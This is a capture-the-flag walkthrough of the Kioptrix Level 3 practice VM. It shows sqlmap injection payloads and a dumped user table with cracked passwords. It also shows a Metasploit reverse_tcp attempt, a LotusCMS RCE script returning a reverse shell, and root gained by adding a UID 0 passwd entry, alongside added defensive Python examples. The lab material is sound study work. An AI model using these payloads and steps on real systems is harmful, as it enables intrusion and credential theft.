Level 3
About Release
Name: Kioptrix: Level 1.2 (#3)
Date release: 18 Apr 2011
Author: Kioptrix
Series: Kioptrix
Web page: http://www.kioptrix.com/blog/?p=358
Download
KVM3.rar (Size: 442 MB)
Download: http://www.kioptrix.com/dlvm/KVM3.rar
Download (Mirror): https://download.vulnhub.com/kioptrix/KVM3.rar
Description
It's been a while since the last Kioptrix VM challenge. Life keeps getting in the way of these things, you know.
After seeing the number of downloads for the last two, and the numerous videos showing ways to beat these challenges, I felt that 1.2 (or just level 3) needed to come out. Thank you to all that downloaded and played the first two. And thank you to the ones that took the time to produce video solutions of them. Greatly appreciated.
As with the other two, this challenge is geared towards the beginner. It is however different. Added a few more steps and a new skill set is required. Still in the realm of the beginner, I must add. The same as the others, there's more than one way to "pwn" this one. There's easy and not so easy. Remember... the sense of "easy" or "difficult" is always relative to one's own skill level. I never said these things were exceptionally hard or difficult, but we all need to start somewhere. And let me tell you, making these vulnerable VMs is not as easy as it looks...
Important thing with this challenge. Once you find the IP (DHCP Client) edit your hosts file and point it to kioptrix3.com
Under Windows, you would edit C:\Windows\System32\drivers\etc\hosts
to look something like this:
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
127.0.0.1 static3.cdn.ubi.com
192.168.1.102 kioptrix3.com
Under Linux that would be /etc/hosts
There's a web application involved, so to have everything nice and properly displayed you really need to do this.
Hope you enjoy Kioptrix VM Level 1.2 challenge.
452 Megs
MD5 Hash : d324ffadd8e3efc1f96447eec51901f2
Have fun
Source: http://www.kioptrix.com/blog/?p=358
Recon
└─$ ip -4 -brief address show eth0
eth0 UP 10.0.2.15/24
└─$ sudo netdiscover -P -i eth0 -r 10.0.2.0/24 | tee netdiscover.log
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.0.2.1 52:54:00:12:35:00 1 60 Unknown vendor
10.0.2.2 52:54:00:12:35:00 1 60 Unknown vendor
10.0.2.3 08:00:27:64:6e:66 1 60 PCS Systemtechnik GmbH
10.0.2.21 08:00:27:0c:18:78 1 60 PCS Systemtechnik GmbH
-- Active scan completed, 4 Hosts found.
└─$ grep kio /etc/hosts
10.0.2.21 kioptrix3.com
HTTP (80)
The landing page's See it now! link redirects to /gallery, where a path parameter selects which items to show, probably from a database. A few payloads against it did not look injectable.
The Ligoat Press Room page has a sort feature that appends extra parameters to the query (gallery.php?id=1&sort=filename).
SQLi
Injecting a single quote (') triggers a SQL error, so the query is injectable. Let sqlmap confirm it and dump the current database:
└─$ sqlmap -u 'http://kioptrix3.com/gallery/gallery.php?id=1&sort=filename' --dbms=mysql --batch --current-db --dump
...
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 49 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: id=(SELECT (CASE WHEN (6172=6172) THEN 1 ELSE (SELECT 2162 UNION SELECT 4307) END))&sort=filename
Type: error-based
Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)
Payload: id=1 OR ROW(5785,2330)>(SELECT COUNT(*),CONCAT(0x71626b6271,(SELECT (ELT(5785=5785,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM (SELECT 5230 UNION SELECT 2834 UNION SELECT 6888 UNION SELECT 5045)a GROUP BY x)&sort=filename
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 2862 FROM (SELECT(SLEEP(5)))GVIe)&sort=filename
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=1 UNION ALL SELECT NULL,CONCAT(0x71626b6271,0x426b4a7a56777a4a6d6856537a45637a7772794a486d41506e6b78767a78434a6a46514c44506676,0x717a6a6a71),NULL,NULL,NULL,NULL-- -&sort=filename
---
...
└─$ bat ~/.local/share/sqlmap/output/kioptrix3.com/dump/gallery/dev_accounts.csv
───────┬────────────────────────────────────────────────────────────────────────────
│ File: /home/woyag/.local/share/sqlmap/output/kioptrix3.com/dump/gallery/dev_accounts.csv
───────┼────────────────────────────────────────────────────────────────────────────
1 │ id,password,username
2 │ 1,0d3eccfb887aabd50f243b3f155c0f85,dreg
3 │ 2,5badcaf789d3d1d09794d8f021f40f0e,loneferret
───────┴────────────────────────────────────────────────────────────────────────────
└─$ bat ~/.local/share/sqlmap/output/kioptrix3.com/dump/gallery/gallarific_users.csv
───────┬────────────────────────────────────────────────────────────────────────────────
│ File: /home/woyag/.local/share/sqlmap/output/kioptrix3.com/dump/gallery/gallarific_users.csv
───────┼────────────────────────────────────────────────────────────────────────────────
1 │ userid,email,photo,website,joincode,lastname,password,username,usertype,firstname,datejoined,issuperuser
2 │ 1,<blank>,<blank>,<blank>,<blank>,User,n0t7t1k4,admin,superuser,Super,1302628616,1
───────┴────────────────────────────────────────────────────────────────────────────────
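To make the sqlmap findings above concrete, here is an added example (not gallery.php's real source, which the writeup never shows) that rebuilds the bug offline in SQLite: a constructed gallarific_photos/dev_accounts schema, a lookup that concatenates both GET parameters into the statement the way the real page evidently does, the quote probe, the boolean-blind pair, the six-column UNION that pulls dev_accounts, and the hardened form beside it. Table names follow the dump; the column layout, the parent column and the ALLOWED_SORT set are assumptions.

```python
import sqlite3

# Constructed stand-in for the Gallarific tables; the column layout is an assumption.
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE gallarific_photos(
            id INTEGER, filename TEXT, title TEXT,
            description TEXT, views INTEGER, parent INTEGER);
        INSERT INTO gallarific_photos VALUES (1, 'kittens.jpg', 'Kittens', 'constructed row', 3, 1);
        CREATE TABLE dev_accounts(id INTEGER, username TEXT, password TEXT);
        INSERT INTO dev_accounts VALUES (1, 'dreg', '0d3eccfb887aabd50f243b3f155c0f85');
        INSERT INTO dev_accounts VALUES (2, 'loneferret', '5badcaf789d3d1d09794d8f021f40f0e');
    """)
    return con

COLUMNS = "id, filename, title, description, views, parent"  # six columns, as sqlmap found

def vulnerable_lookup(con, id_param, sort_param="filename"):
    """Models the bug: both GET parameters are pasted straight into the SQL text."""
    sql = (f"SELECT {COLUMNS} FROM gallarific_photos "
           f"WHERE parent = {id_param} ORDER BY {sort_param}")
    return con.execute(sql).fetchall()

def quote_triggers_error(con):
    """The manual probe from the writeup: a stray quote breaks the statement."""
    try:
        vulnerable_lookup(con, "1'")
    except sqlite3.OperationalError:
        return True
    return False

# UNION payload in the shape sqlmap used: six columns, data smuggled in column 2.
# SQLite concatenates with ||; MySQL would use CONCAT().
UNION_PAYLOAD = ("1 UNION ALL SELECT NULL, username || ':' || password, "
                 "NULL, NULL, NULL, NULL FROM dev_accounts-- -")

def dump_dev_accounts(con):
    """Rows whose id is NULL came from the injected SELECT, not from the photo table."""
    rows = vulnerable_lookup(con, UNION_PAYLOAD)
    return [r[1] for r in rows if r[0] is None]

# Hardened form: bind the integer, and allow-list the ORDER BY column because a
# column name cannot be a bound parameter.
ALLOWED_SORT = {"filename", "title", "views"}

def safe_lookup(con, id_param, sort_param="filename"):
    if sort_param not in ALLOWED_SORT:
        raise ValueError("unsupported sort column")
    sql = f"SELECT {COLUMNS} FROM gallarific_photos WHERE parent = ? ORDER BY {sort_param}"
    return con.execute(sql, (int(id_param),)).fetchall()

def safe_rejects(con, id_param, sort_param="filename"):
    """True when the hardened lookup refuses the input instead of running it."""
    try:
        safe_lookup(con, id_param, sort_param)
    except (ValueError, TypeError):
        return True
    return False

if __name__ == "__main__":
    db = make_db()
    print("quote error:", quote_triggers_error(db))
    print("1 AND 1=1 ->", len(vulnerable_lookup(db, "1 AND 1=1")), "rows")
    print("1 AND 1=2 ->", len(vulnerable_lookup(db, "1 AND 1=2")), "rows")
    print("union dump:", dump_dev_accounts(db))
    print("hardened rejects union:", safe_rejects(db, UNION_PAYLOAD))
```

The allow-list on sort matters as much as the bound id: sqlmap only reported id, but an ORDER BY clause built from a request parameter is the same class of bug and a prepared statement alone cannot fix it.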
Database Accounts
Crack the two dev_accounts hashes (unsalted MD5):
0d3eccfb887aabd50f243b3f155c0f85  md5  Mast3r
5badcaf789d3d1d09794d8f021f40f0e  md5  starwars
SSH Creds
admin : n0t7t1k4 (stored in plaintext in gallarific_users)
dreg : Mast3r
loneferret : starwars
Oddly enough, none of these worked on the CMS login page, but dreg and loneferret are valid SSH credentials (admin is not).
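The cracking step above is an online lookup in the writeup; as an added example (not the author's code), here is the same dictionary attack done locally against the two dev_accounts hashes, with a handful of mangling rules so that Mast3r is recovered from the base word master rather than having to be in the list. The wordlist and the LEET rule table are constructed for the example; on a real engagement you would run hashcat -m 0 or john --format=raw-md5 over rockyou.txt instead.

```python
import hashlib

# Hashes exactly as dumped from dev_accounts above (unsalted MD5).
DEV_HASHES = {
    "dreg": "0d3eccfb887aabd50f243b3f155c0f85",
    "loneferret": "5badcaf789d3d1d09794d8f021f40f0e",
}

# Constructed wordlist; note that "Mast3r" itself is not in it.
WORDLIST = ["password", "master", "starwars", "admin", "letmein"]

# Single-character leet substitutions, applied one at a time (assumed rule set).
LEET = [("a", "4"), ("e", "3"), ("i", "1"), ("o", "0"), ("s", "$")]

def candidates(word):
    """Yield the word, its capitalised form, and one-substitution leet variants of each."""
    for base in (word, word.capitalize()):
        yield base
        for plain, sub in LEET:
            if plain in base:
                yield base.replace(plain, sub)

def looks_like_md5(h):
    """32 hex characters: the only thing that distinguishes raw MD5 from e.g. NTLM."""
    return len(h) == 32 and all(c in "0123456789abcdef" for c in h.lower())

def crack_md5(target, wordlist=WORDLIST):
    """Return the first candidate whose MD5 matches target, or None."""
    if not looks_like_md5(target):
        raise ValueError("not a raw MD5 hex digest")
    target = target.lower()
    for word in wordlist:
        for cand in candidates(word):
            if hashlib.md5(cand.encode()).hexdigest() == target:
                return cand
    return None

def crack_all(hashes=DEV_HASHES, wordlist=WORDLIST):
    return {user: crack_md5(h, wordlist) for user, h in hashes.items()}

if __name__ == "__main__":
    for user, plain in crack_all().items():
        print(f"{user}: {plain}")
```

The point of the rule layer is that a 32-hex unsalted MD5 costs nothing per guess, so even a short wordlist times a few rules covers the l33t-speak variants people use to "strengthen" a dictionary word; a salted, slow hash (the sha512crypt generated later with openssl passwd -6) would make each of these guesses orders of magnitude more expensive.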
LotusCMS
The CMS behind the web app is LotusCMS.
A quick Google search leads to the LotusCMS 3.0 eval() Remote Command Execution exploit. The Metasploit module failed to get a shell:
msf6 > use exploit/multi/http/lcms_php_exec
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/lcms_php_exec) > set RHOST 10.0.2.21
RHOST => 10.0.2.21
msf6 exploit(multi/http/lcms_php_exec) > set URI /
URI => /
msf6 exploit(multi/http/lcms_php_exec) > run
[*] Started reverse TCP handler on 10.0.2.15:4444
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Exploit completed, but no session was created.
└─$ git clone https://github.com/Hood3dRob1n/LotusCMS-Exploit.git
└─$ cd LotusCMS-Exploit
└─$ bash lotusRCE.sh kioptrix3.com /
In a second terminal the listener catches the shell, running as www-data:
└─$ listen # rlwrap ncat -lvnp 4444
www-data
We don't need to go further down this path, since we already have real user accounts for SSH.
SSH (22)
We have two users we can log in as. The VM's old OpenSSH still uses a DSA host key and SHA-1 group14 key exchange, which current clients disable by default, so both have to be re-enabled for this connection:
└─$ ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss dreg@10.0.2.21
dreg@Kioptrix3:~$ id
uid=1001(dreg) gid=1001(dreg) groups=1001(dreg)
dreg@Kioptrix3:~$ sudo -l
[sudo] password for dreg: Mast3r
Sorry, user dreg may not run sudo on Kioptrix3.
dreg@Kioptrix3:~$ su - loneferret
Password: starwars
loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
(root) NOPASSWD: !/usr/bin/su
(root) NOPASSWD: /usr/local/bin/ht
Looks like loneferret has sudo access, so we'll discard dreg.
Sudo Binaries
Great: su doesn't exist at the listed path (and the ! in that sudoers entry is a negation, so su is explicitly denied anyway), while ht is an odd program...
loneferret@Kioptrix3:~$ sudo /usr/bin/su
sudo: /usr/bin/su: command not found
loneferret@Kioptrix3:~$ ls /usr/bin/s?
/usr/bin/sg
loneferret@Kioptrix3:~$ sudo /usr/local/bin/ht
Error opening terminal: tmux-256color.
loneferret@Kioptrix3:~$ ls
checksec.sh CompanyPolicy.README
loneferret@Kioptrix3:~$ cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
DG
CEO
Since I couldn't run the binary or get help or a man page, I decided to look at the strings in the program; piping the result to less gave "terminal is not fully functional".
Fix Terminal
ArchLinux » Networking, Server, and Protection» WARNING: terminal is not fully functional
loneferret@Kioptrix3:~$ ht
Error opening terminal: tmux-256color.
loneferret@Kioptrix3:~$ strings /usr/local/bin/ht | less
WARNING: terminal is not fully functional
loneferret@Kioptrix3:~$ export TERM=rxvt
loneferret@Kioptrix3:~$ ht # <-- Worked
loneferret@Kioptrix3:~$
Setting TERM fixed the issue: the VM's terminfo database has no entry for tmux-256color, so ht could not initialise the terminal, while rxvt is an entry it does have. sudo keeps TERM in the environment, so the same fix works for sudo ht.
sudo /usr/local/bin/ht
The program is an editor. The highlighted first letters in the menu bar are shortcuts, reachable with Alt+KEY.
To open a file: Alt+F -> Arrow Down -> Open -> filename.
We essentially have an editor running as root, so we can read or write any file on the system; /etc/passwd, /etc/shadow and /etc/sudoers are the obvious targets.
Add New User
Let's add a new user to the system. Generate a SHA-512 crypt hash (password door, salt back), then use sudo ht to append an entry for the new user to /etc/passwd with that hash in the second field and UID/GID 0:
└─$ openssl passwd -6 -salt back door
$6$back$ZEe0NXkJ.MD8pgefaf8ihIknjA5aBcdHra0qz2/784AoQlin/X/qlqsQj2LdqXs55GHAA2PgcjB121eZSuP5I0
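The screenshot of the ht edit is not reproduced here, so as an added example (not from the writeup) this builds the passwd line the edit amounts to and shows the audit a defender would run afterwards: any UID 0 account other than root, and any account carrying a real hash in /etc/passwd instead of an x pointing at /etc/shadow. The sample passwd content is constructed (only the uwu hash is the one generated above); the home directory and shell given to uwu are assumptions, and the "No directory, logging in with HOME=/" message in the next step only tells us the home field pointed somewhere that did not exist.

```python
# Hash produced by `openssl passwd -6 -salt back door` above.
ROOT_HASH = ("$6$back$ZEe0NXkJ.MD8pgefaf8ihIknjA5aBcdHra0qz2/784AoQlin/X/qlqsQj2LdqXs55"
             "GHAA2PgcjB121eZSuP5I0")

def build_passwd_entry(name, pw_hash, uid=0, gid=0, home="/nonexistent", shell="/bin/bash"):
    """One /etc/passwd line. A crypt hash in field 2 bypasses the shadow lookup entirely."""
    for field in (name, pw_hash, home, shell):
        if ":" in field or "\n" in field:
            raise ValueError("colon or newline in passwd field")
    return f"{name}:{pw_hash}:{uid}:{gid}::{home}:{shell}"

# Constructed sample file; uids other than dreg's are assumptions.
SAMPLE_PASSWD = "\n".join([
    "root:x:0:0:root:/root:/bin/bash",
    "www-data:x:33:33:www-data:/var/www:/bin/sh",
    "loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash",
    "dreg:x:1001:1001:dreg,,,:/home/dreg:/bin/bash",
    build_passwd_entry("uwu", ROOT_HASH),
]) + "\n"

def parse_passwd(text):
    """Split passwd(5) lines into dicts, skipping blanks, comments and malformed rows."""
    users = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) != 7:
            continue
        users.append({"name": f[0], "hash": f[1], "uid": int(f[2]), "gid": int(f[3]),
                      "home": f[5], "shell": f[6]})
    return users

def audit_passwd(text):
    """Flag the two artefacts this privilege escalation leaves behind."""
    findings = []
    for u in parse_passwd(text):
        if u["uid"] == 0 and u["name"] != "root":
            findings.append(f"extra UID 0 account: {u['name']}")
        if u["hash"] not in ("x", "*", "!", ""):
            findings.append(f"password hash stored in passwd, not shadow: {u['name']}")
    return findings

if __name__ == "__main__":
    print(build_passwd_entry("uwu", ROOT_HASH))
    for finding in audit_passwd(SAMPLE_PASSWD):
        print("FINDING:", finding)
```

Putting the hash directly into /etc/passwd is what makes this work without touching /etc/shadow: the login code only consults shadow when field 2 is x. It is also why the check above is cheap and worth running from integrity monitoring, since a legitimate system never has a second UID 0 line or a real hash in passwd.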
Root
loneferret@Kioptrix3:~$ su - uwu
Password: door
No directory, logging in with HOME=/
root@Kioptrix3:/# cd /root
root@Kioptrix3:/root# ls -l
total 16
-rw-r--r-- 1 root root 1327 2011-04-16 08:13 Congrats.txt
drwxr-xr-x 12 root root 12288 2011-04-16 07:26 ht-2.0.18
root@Kioptrix3:/root# cat Congrats.txt
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasnt that bad now was it.
Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone.
Difficulty is relative, keep that in mind.
The object is to learn, do some research and have a little (legal)
fun in the process.
I hope you enjoyed this third challenge.
Steven McElrea
aka loneferret
http://www.kioptrix.com
Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.
Main page CMS:
http://www.lotuscms.org
Gallery application:
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/
The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/
Also, all pictures were taken from Google Images, so being part of the
public domain I used them.